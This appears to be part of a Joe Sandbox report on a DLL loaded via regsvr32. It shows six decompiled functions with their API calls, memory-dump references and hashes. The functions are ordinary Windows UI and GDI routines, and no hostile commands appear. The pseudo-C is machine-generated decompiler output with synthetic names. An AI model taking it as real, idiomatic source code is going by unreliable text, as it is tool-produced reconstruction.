                                                                                                                Function 100386BB Relevance: 7.6, APIs: 5, Instructions: 79windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E100386BB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t42;
				long _t45;
				long _t52;
				void* _t64;
				void* _t68;
				void* _t72;
				void* _t74;
				int _t76;
				void* _t77;
				void* _t84;

				_t72 = __edx;
				_t59 = __ebx;
				_push(8);
				E1004764D(0x10090d2c, __ebx, __edi, __esi);
				_t74 = __ecx;
				_t76 = 0;
				 *(_t77 - 0x14) = 0;
				if(( *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					L9:
					_push( *((intOrPtr*)( *((intOrPtr*)(_t74 + 0x74)) + 0x1c)));
					E1000B543(_t59,  *((intOrPtr*)(_t77 + 8)), _t74, _t76, _t84);
				} else {
					L1000140B(_t77 - 0x10, E100184C0());
					 *(_t77 - 4) = 0;
					_t76 = 0x104;
					_t42 = L100011F4(_t77 - 0x10, 0x104);
					_t59 = GetParent;
					 *(_t77 - 0x14) = _t42;
					_t45 = SendMessageA( *(E10013FEA(GetParent, _t77 - 0x10, _t77, GetParent( *(_t74 + 0x20))) + 0x20), 0x464, 0x104,  *(_t77 - 0x14));
					_t64 = _t77 - 0x10;
					if(_t45 >= 0) {
						E1000FED3(_t64, 0xffffffff);
					} else {
						L100011D1(_t64);
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_t77 - 0x10)) - 0xc)) == 0) {
						L8:
						 *(_t77 - 4) =  *(_t77 - 4) | 0xffffffff;
						_t84 =  *((intOrPtr*)(_t77 - 0x10)) + 0xfffffff0;
						L100013E3( *((intOrPtr*)(_t77 - 0x10)) + 0xfffffff0, _t72);
						goto L9;
					} else {
						 *(_t77 - 0x14) = L100011F4(_t77 - 0x10, _t76);
						_t52 = SendMessageA( *(E10013FEA(_t59, _t77 - 0x10, _t77, GetParent( *(_t74 + 0x20))) + 0x20), 0x465, _t76,  *(_t77 - 0x14));
						_t68 = _t77 - 0x10;
						if(_t52 >= 0) {
							E1000FED3(_t68, 0xffffffff);
							L100010F5( *((intOrPtr*)(_t77 + 8)), __eflags, _t77 - 0x10);
							L100013E3( *((intOrPtr*)(_t77 - 0x10)) + 0xfffffff0, _t72);
						} else {
							L100011D1(_t68);
							goto L8;
						}
					}
				}
				return E10047725( *((intOrPtr*)(_t77 + 8)));
			}













                                                                                                                0x100386bb
                                                                                                                0x100386bb
                                                                                                                0x100386bb
                                                                                                                0x100386c2
                                                                                                                0x100386c7
                                                                                                                0x100386cc
                                                                                                                0x100386d5
                                                                                                                0x100386d8
                                                                                                                0x1003878e
                                                                                                                0x10038791
                                                                                                                0x10038797
                                                                                                                0x100386e7
                                                                                                                0x100386f0
                                                                                                                0x100386f5
                                                                                                                0x100386f8
                                                                                                                0x10038701
                                                                                                                0x10038709
                                                                                                                0x1003870f
                                                                                                                0x10038726
                                                                                                                0x1003872e
                                                                                                                0x10038731
                                                                                                                0x1003873c
                                                                                                                0x10038733
                                                                                                                0x10038733
                                                                                                                0x10038733
                                                                                                                0x10038748
                                                                                                                0x1003877f
                                                                                                                0x10038782
                                                                                                                0x10038786
                                                                                                                0x10038789
                                                                                                                0x00000000
                                                                                                                0x1003874a
                                                                                                                0x10038756
                                                                                                                0x1003876d
                                                                                                                0x10038775
                                                                                                                0x10038778
                                                                                                                0x100387a9
                                                                                                                0x100387b5
                                                                                                                0x100387c0
                                                                                                                0x1003877a
                                                                                                                0x1003877a
                                                                                                                0x00000000
                                                                                                                0x1003877a
                                                                                                                0x10038778
                                                                                                                0x10038748
                                                                                                                0x100387a4

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageParentSend$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 1482283565-0
                                                                                                                • Opcode ID: 09b1453e6342188a1c2edcaf826d266a5714f08db37630e54f7a1ed38f046747
                                                                                                                • Instruction ID: cbea5dba2a6c1b6782beba48e7ce02a626e7777fb2f1a3a4d457981e434d63e9
                                                                                                                • Opcode Fuzzy Hash: 09b1453e6342188a1c2edcaf826d266a5714f08db37630e54f7a1ed38f046747
                                                                                                                • Instruction Fuzzy Hash: C2319A7590461AEFDB05DFB0CC85AEEBB71FF05350B200268F5216B1E6CB30AA00DB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10035656 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E10035656(void* __ecx, void* __ebp, unsigned int _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t20;
				void* _t21;
				void* _t23;
				void* _t34;
				void* _t35;
				struct HWND__* _t36;
				void* _t37;

				_t37 = __ebp;
				_t29 = __ecx;
				_t35 = __ecx;
				if((E100177F8(__ecx) & 0x40000000) == 0) {
					_t29 = __ecx;
					_t34 = E10014BA7(__ecx);
				} else {
					_t34 = __ecx;
				}
				_t41 = _t34;
				if(_t34 == 0) {
					E1000A069(0, _t29, _t34, _t35, _t41);
				}
				_push(_t37);
				if((_a4 & 0x0000000c) != 0) {
					_t23 = E1001795E(_t34);
					if(( !(_a4 >> 3) & 0x00000001) == 0 || _t23 == 0 || _t34 == _t35) {
						SendMessageA( *(_t34 + 0x20), 0x86, 0, 0);
					} else {
						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) | 0x00000200;
						SendMessageA( *(_t34 + 0x20), 0x86, 1, 0);
						 *(_t35 + 0x3c) =  *(_t35 + 0x3c) & 0xfffffdff;
					}
				}
				_push(5);
				_push(GetDesktopWindow());
				while(1) {
					_t20 = GetWindow();
					_t36 = _t20;
					if(_t36 == 0) {
						break;
					}
					_t21 = E10034C53( *(_t34 + 0x20), _t36);
					__eflags = _t21;
					if(_t21 != 0) {
						SendMessageA(_t36, 0x36d, _a4, 0);
					}
					_push(2);
					_push(_t36);
				}
				return _t20;
			}













                                                                                                                0x10035656
                                                                                                                0x10035656
                                                                                                                0x10035659
                                                                                                                0x10035665
                                                                                                                0x1003566b
                                                                                                                0x10035672
                                                                                                                0x10035667
                                                                                                                0x10035667
                                                                                                                0x10035667
                                                                                                                0x10035676
                                                                                                                0x10035678
                                                                                                                0x1003567a
                                                                                                                0x1003567a
                                                                                                                0x10035684
                                                                                                                0x1003568b
                                                                                                                0x1003568f
                                                                                                                0x100356a0
                                                                                                                0x100356d1
                                                                                                                0x100356aa
                                                                                                                0x100356aa
                                                                                                                0x100356bc
                                                                                                                0x100356be
                                                                                                                0x100356be
                                                                                                                0x100356a0
                                                                                                                0x100356d3
                                                                                                                0x100356e1
                                                                                                                0x10035702
                                                                                                                0x10035702
                                                                                                                0x10035704
                                                                                                                0x10035708
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100356e8
                                                                                                                0x100356ed
                                                                                                                0x100356ef
                                                                                                                0x100356fd
                                                                                                                0x100356fd
                                                                                                                0x100356ff
                                                                                                                0x10035701
                                                                                                                0x10035701
                                                                                                                0x1003570e

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100177F8: GetWindowLongA.USER32(?,000000F0), ref: 10017803
                                                                                                                • SendMessageA.USER32 ref: 100356BC
                                                                                                                • SendMessageA.USER32 ref: 100356D1
                                                                                                                • GetDesktopWindow.USER32 ref: 100356D5
                                                                                                                • SendMessageA.USER32 ref: 100356FD
                                                                                                                • GetWindow.USER32(00000000), ref: 10035702
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$DesktopLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 2272707703-0
                                                                                                                • Opcode ID: 52c92ffb03a877432c12eaf483e9684fa833189396604cfc91ae397ea414aa04
                                                                                                                • Instruction ID: 3d98941bdb409902b6d145e6d0440896241f45a2040b1dcf033ce4d8e4ed85b0
                                                                                                                • Opcode Fuzzy Hash: 52c92ffb03a877432c12eaf483e9684fa833189396604cfc91ae397ea414aa04
                                                                                                                • Instruction Fuzzy Hash: 7311E232200B166FE222DA208C83F6F7699EB45797F414118F5811F4F1CF63EC408AA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10035E3A Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E10035E3A(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int _t23;
				int _t29;
				unsigned int _t49;
				void* _t52;
				void* _t55;
				intOrPtr _t56;
				void* _t57;
				signed int _t58;
				void* _t60;

				_t53 = __edi;
				_t52 = __edx;
				_t43 = __ebx;
				_t58 = _t60 - 0x90;
				_t23 =  *0x100b9e70; // 0xbb35530
				 *(_t58 + 0x8c) = _t23 ^ _t58;
				_push(_t55);
				 *((intOrPtr*)(_t58 - 0x80)) = __ecx;
				 *(_t58 - 0x7c) =  *(_t58 + 0x98);
				_t56 =  *((intOrPtr*)(E1001E302(__ebx, __edi, _t55, __eflags) + 4));
				if(_t56 != 0 &&  *(_t58 + 0x9c) != 0) {
					_t49 =  *(_t58 + 0x9c) >> 0x10;
					if(_t49 != 0) {
						_t29 =  *(_t56 + 0x90) & 0x0000ffff;
						if( *(_t58 + 0x9c) == _t29 && _t49 ==  *(_t56 + 0x92)) {
							_push(__ebx);
							_push(__edi);
							GlobalGetAtomNameA(_t29, _t58 - 0x78, 0x103);
							GlobalAddAtomA(_t58 - 0x78);
							GlobalGetAtomNameA( *(_t56 + 0x92) & 0x0000ffff, _t58 - 0x78, 0x103);
							GlobalAddAtomA(_t58 - 0x78);
							SendMessageA( *(_t58 - 0x7c), 0x3e4,  *( *((intOrPtr*)(_t58 - 0x80)) + 0x20), ( *(_t56 + 0x92) & 0x0000ffff) << 0x00000010 |  *(_t56 + 0x90) & 0x0000ffff);
							_pop(_t53);
							_pop(_t43);
						}
					}
				}
				_pop(_t57);
				return E1004763E(0, _t43,  *(_t58 + 0x8c) ^ _t58, _t52, _t53, _t57);
			}














                                                                                                                0x10035e3a
                                                                                                                0x10035e3a
                                                                                                                0x10035e3a
                                                                                                                0x10035e3b
                                                                                                                0x10035e48
                                                                                                                0x10035e4f
                                                                                                                0x10035e5b
                                                                                                                0x10035e5c
                                                                                                                0x10035e5f
                                                                                                                0x10035e67
                                                                                                                0x10035e6c
                                                                                                                0x10035e86
                                                                                                                0x10035e8c
                                                                                                                0x10035e8e
                                                                                                                0x10035e9c
                                                                                                                0x10035ea7
                                                                                                                0x10035ea8
                                                                                                                0x10035eb9
                                                                                                                0x10035ec5
                                                                                                                0x10035ed8
                                                                                                                0x10035ede
                                                                                                                0x10035f02
                                                                                                                0x10035f08
                                                                                                                0x10035f09
                                                                                                                0x10035f09
                                                                                                                0x10035e9c
                                                                                                                0x10035e8c
                                                                                                                0x10035f14
                                                                                                                0x10035f21

                                                                                                                APIs
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10035EB9
                                                                                                                • GlobalAddAtomA.KERNEL32(?), ref: 10035EC5
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10035ED8
                                                                                                                • GlobalAddAtomA.KERNEL32(?), ref: 10035EDE
                                                                                                                • SendMessageA.USER32 ref: 10035F02
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AtomGlobal$Name$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1515195355-0
                                                                                                                • Opcode ID: 25b75d531d4a76369cd37772913bff965d773d12cf12d742e22f3eaf2c4a1cd6
                                                                                                                • Instruction ID: 5be1171fdf3591e7c986fb132ddb1d6712cc4fbab815219dffaaa8beb173d6a2
                                                                                                                • Opcode Fuzzy Hash: 25b75d531d4a76369cd37772913bff965d773d12cf12d742e22f3eaf2c4a1cd6
                                                                                                                • Instruction Fuzzy Hash: BD212F719005189EEB30DFB9CC45BEEB7F8FB08701F11451AE99AD7192E774A944CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003E51C Relevance: 7.6, APIs: 5, Instructions: 59windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003E51C(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t24;
				unsigned int _t34;
				void* _t46;

				_t46 = __ecx;
				if(IsWindow( *(__ecx + 0x20)) == 0) {
					 *(_t46 + 0xac) = _a4;
					 *(_t46 + 0xb0) = _a8;
					 *(_t46 + 0xa4) = _a12;
					_t24 = _a16;
					 *(_t46 + 0xa8) = _t24;
					return _t24;
				}
				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				if( *0x100b9b10 >= 0x60000) {
					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
					 *(_t46 + 0xac) = _t34 & 0x0000ffff;
					 *(_t46 + 0xb0) = _t34 >> 0x10;
				}
				return InvalidateRect( *(_t46 + 0x20), 0, 1);
			}






                                                                                                                0x1003e520
                                                                                                                0x1003e52d
                                                                                                                0x1003e5a8
                                                                                                                0x1003e5b1
                                                                                                                0x1003e5ba
                                                                                                                0x1003e5c0
                                                                                                                0x1003e5c3
                                                                                                                0x00000000
                                                                                                                0x1003e5c3
                                                                                                                0x1003e550
                                                                                                                0x1003e569
                                                                                                                0x1003e575
                                                                                                                0x1003e581
                                                                                                                0x1003e589
                                                                                                                0x1003e58f
                                                                                                                0x1003e58f
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$InvalidateRectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225880595-0
                                                                                                                • Opcode ID: eba55d63198051db967d26b7d17f113c89d239f5d41592b7936e75cdc709e4af
                                                                                                                • Instruction ID: cc940a1e5372195ee0a3d138bca3cef25a0481447a39ca6b3c91d1d4f11775ec
                                                                                                                • Opcode Fuzzy Hash: eba55d63198051db967d26b7d17f113c89d239f5d41592b7936e75cdc709e4af
                                                                                                                • Instruction Fuzzy Hash: 93111CB1210718AFF7108F29CC80AB7B7E8FB44745F00492AF99AC6160E7B0AC50DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001FC86 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1001FC86(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x100bdc90; // 0x60
					_t12 =  *0x100bdc94; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000CB4B(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                                0x1001fc89
                                                                                                                0x1001fc8c
                                                                                                                0x1001fc91
                                                                                                                0x1001fcdd
                                                                                                                0x1001fce3
                                                                                                                0x00000000
                                                                                                                0x1001fc93
                                                                                                                0x1001fc9c
                                                                                                                0x1001fca1
                                                                                                                0x1001fcd7
                                                                                                                0x1001fcd9
                                                                                                                0x1001fce8
                                                                                                                0x1001fce8
                                                                                                                0x1001fcfa
                                                                                                                0x1001fd02
                                                                                                                0x1001fd08
                                                                                                                0x1001fd0a
                                                                                                                0x1001fca8
                                                                                                                0x1001fcaa
                                                                                                                0x1001fcae
                                                                                                                0x1001fcb6
                                                                                                                0x1001fcbd
                                                                                                                0x1001fcc0
                                                                                                                0x1001fcc0
                                                                                                                0x1001fca1
                                                                                                                0x1001fd11

                                                                                                                APIs
                                                                                                                • GetMapMode.GDI32(?), ref: 1001FC96
                                                                                                                • GetDeviceCaps.GDI32(?,00000058), ref: 1001FCD0
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 1001FCD9
                                                                                                                  • Part of subcall function 1000CB4B: MulDiv.KERNEL32 ref: 1000CB8B
                                                                                                                  • Part of subcall function 1000CB4B: MulDiv.KERNEL32 ref: 1000CBA8
                                                                                                                • MulDiv.KERNEL32 ref: 1001FCFD
                                                                                                                • MulDiv.KERNEL32 ref: 1001FD08
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Mode
                                                                                                                • String ID:
                                                                                                                • API String ID: 696222070-0
                                                                                                                • Opcode ID: c5bfe97383b21167ecbfd5733dc43ed74f11ef28515f61892ee91f832a9f131c
                                                                                                                • Instruction ID: 2dda1ed18a893bb91b8f729ca021f7bbaa3251bb817cbd0e8215410ef64a26ea
                                                                                                                • Opcode Fuzzy Hash: c5bfe97383b21167ecbfd5733dc43ed74f11ef28515f61892ee91f832a9f131c
                                                                                                                • Instruction Fuzzy Hash: 3B11C235600A14AFDB21AF55CD84C2EBBE9FF99750B11041AF9865B361CB71EC40DF80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001FD14 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1001FD14(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x100bdc90; // 0x60
					_t12 =  *0x100bdc94; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E1000CAE2(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}









                                                                                                                0x1001fd17
                                                                                                                0x1001fd1a
                                                                                                                0x1001fd1f
                                                                                                                0x1001fd6b
                                                                                                                0x1001fd71
                                                                                                                0x00000000
                                                                                                                0x1001fd21
                                                                                                                0x1001fd2a
                                                                                                                0x1001fd2f
                                                                                                                0x1001fd65
                                                                                                                0x1001fd67
                                                                                                                0x1001fd76
                                                                                                                0x1001fd76
                                                                                                                0x1001fd88
                                                                                                                0x1001fd91
                                                                                                                0x1001fd96
                                                                                                                0x1001fd98
                                                                                                                0x1001fd36
                                                                                                                0x1001fd38
                                                                                                                0x1001fd3c
                                                                                                                0x1001fd44
                                                                                                                0x1001fd4b
                                                                                                                0x1001fd4e
                                                                                                                0x1001fd4e
                                                                                                                0x1001fd2f
                                                                                                                0x1001fd9f

                                                                                                                APIs
                                                                                                                • GetMapMode.GDI32(?), ref: 1001FD24
                                                                                                                • GetDeviceCaps.GDI32(?,00000058), ref: 1001FD5E
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 1001FD67
                                                                                                                  • Part of subcall function 1000CAE2: MulDiv.KERNEL32 ref: 1000CB22
                                                                                                                  • Part of subcall function 1000CAE2: MulDiv.KERNEL32 ref: 1000CB3F
                                                                                                                • MulDiv.KERNEL32 ref: 1001FD8B
                                                                                                                • MulDiv.KERNEL32 ref: 1001FD96
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Mode
                                                                                                                • String ID:
                                                                                                                • API String ID: 696222070-0
                                                                                                                • Opcode ID: a09eb238ece8f688eb0d6614b3b950c93c589ed83f5e5c5479ebd71d61082c37
                                                                                                                • Instruction ID: 1b1f7cd94bb43c6985f4debd3ae4dface2fa8dd3e1b3935f9df79c40de1ecee6
                                                                                                                • Opcode Fuzzy Hash: a09eb238ece8f688eb0d6614b3b950c93c589ed83f5e5c5479ebd71d61082c37
                                                                                                                • Instruction Fuzzy Hash: C011AC35600A14AFEB21AF65CC84C2EBBBAEF99754B114419F9869B360DB71EC41DB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

